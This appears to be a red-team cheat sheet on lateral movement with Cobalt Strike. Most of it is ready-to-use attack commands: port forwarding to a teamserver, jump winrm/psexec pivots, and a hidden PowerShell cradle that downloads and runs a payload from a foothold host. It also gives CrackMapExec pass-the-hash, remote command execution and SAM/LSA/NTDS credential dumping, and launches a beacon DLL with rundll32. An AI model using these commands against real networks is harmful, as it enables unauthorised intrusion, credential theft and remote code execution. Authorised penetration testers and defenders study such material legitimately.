Cobalt Strike

Lateral Movement

Initial Access

Use HTTP listener and scripted web delivery

General Lateral Movment

Set up an SMB listener and use that when moving with jump command

HTTP Shells

    Set up a HTTP listener
      HTTP host is the first target compromised (foothold machine)
      HTTP Host (Stager) same as above
      HTTP Port (C2) is 443
    On foothold machine port forward to teamserver
      rportfwd 443 <teamserver> 443
    On foothold machine jump across
      jump winrm <target> <HTTP listener above>
    ​
    For further hops new listeners and portfwrds need to occur for any machine that cant talk to the foothold directly

Double Hop

When going over winrm and psexec you may encounter double hop issues same as usual.
1
jump psexec 127.0.0.1 SMB
2
​
3
# After this use spawned session
Copied!

Evil Winrm

Useful for when you need to pipe through a box that you cant get a beacon on. E.g. applocker
    Have HTTP listener set up as above (for this named redir) with rportfwd
    Set up scripted web delivery
      Local Host = Foothold
      Local port = 443
      Listener = redir
      Type = powershell x64
    SOCKS proxy through foothold
      socks 9051
      proxychains evil-winrm -i <ip> -u Domain\username -p 'Password'
    Pass creds and launch scripted web delivery on target2
      $password = "Password" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\Username",$password); invoke-command -computername TARGET2 -Credential $cred -scriptblock {powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://FOOTHOLDIP:443/pivtest'))"}​
      Keep WINRM alive for session to stay alive (or migrate to another process)

CrackMapExec

1
Socks Proxy through as before
2
# Test login and get hostname
3
crackmapexec smb <IP> -u <username> -p <password> [-d <domain>] [--local-auth]
4
​
5
# Pass the hash
6
crackmapexec smb <IP> -u <username> -H <hash>
7
​
8
# Execute Commands
9
crackmapexec -u <username> -p <password> -x whoami [--exec-method wmiexec/smbexec/atexec]
10
​
11
# Dumps
12
crackmapexec smb <ip> -u <username> -p <password> [--lsa] [--sam] [--ntds [vss]]
Copied!

Dll

1
rundll32 C:\beacon.dll,Start
Copied!

Passing Powershell creds

1
$password = "Password123" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\User",$password); invoke-command -computername 192.168.144.197 -Credential $cred -scriptblock {whoami}
Copied!

General Tips

    Make_token is only for cleartext passwords
    Rubeus asktgt doesnt work so well with the /domain flag set
Last modified 1yr ago